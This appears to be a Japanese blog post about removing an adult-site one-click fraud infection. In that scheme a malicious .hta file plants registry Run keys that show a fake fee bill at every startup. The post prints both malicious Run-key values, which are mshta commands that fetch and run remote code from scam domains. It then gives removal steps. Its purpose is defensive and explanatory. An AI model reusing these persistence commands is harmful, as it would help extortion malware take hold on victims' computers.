[登録請求画面消えない] アダルトマジック アダルト館 エロ動画ウイルス配信型ワンクリック詐欺



  • ウイルス感染原因: 警告を無視してユーザー自らの手によるマウスクリックでウイルスを実行

  • 実行したウイルス: movie_*****.hta (どう見ても動画ファイルではない)

  • ウイルス感染症状: デスクトップに入会完了・料金請求画面の永続的強制表示

  • ウイルス感染挙動: Windowsのレジストリの改竄 (パソコンを再起動しても表示は消えない)

  • ウイルス感染回避策: 強制感染するわけではないので、警告を無視せずキャンセルしてウイルスの実行を拒否する

 このようなソフトウェアを導入していたにもかかわらず感染を阻止してくれなかった・・・?
 自ら感染許可を与えてしまったあなたに根本的な原因があるのは当たり前として、世界で広く蔓延してるわけでもなく、日本のごくごく限定的な特定の人にしかもたらされないローカルなウイルスまで必ずしも対応されません。


『有料動画サイトへの入会手続きが完了しました! 180日間見放題! 3日以内のご入金ならキャンペーン価格でご提供!!』



レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 2 つのデータを確認しました [2011/12/** 9:27]


【キー2】
名前: system_boot_ddfebc491283f952c03737b792d84336
データ: C:\windows\system32\mshta h**p://theater-zoom.com/reg2.php?cid=ddfebc491283f952c03737b792d84336
怪しさ ⇒ 30 ポイント
更新日時 ⇒ 確認不要(Webアドレス)


【キー1】
名前: system_boot_140f8f34a8017800e65daf48d50d2df2
データ: C:\windows\system32\mshta h**p://ufologist-gest.com/reg2.php?cid=140f8f34a8017800e65daf48d50d2df2
怪しさ ⇒ 30 ポイント
更新日時 ⇒ 確認不要(Webアドレス)


■ ■ ■ ■ ■ ■ ■ ■ ■ ■


OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html


■ ■ ■ ■ ■ ■ ■ ■ ■ ■



  1. 診断結果の確認 【~が消えない.exe】

  2. ウイルスにより不正登録されたレジストリRunキーから該当項目1つを削除 【レジストリエディタ】 ※

  3. パソコンを再起動して反省会

※ キーが2つあるのは、同系サイト2か所でウイルスを実行し感染させてあるため。 イメージ 1


http://farm8.staticflickr.com/7150/6481658431_c825de1180_z.jpg


動画ウイルスを配信するワンクリック詐欺サイト対策
アダルト動画エロサイト見ましたね振り込め詐欺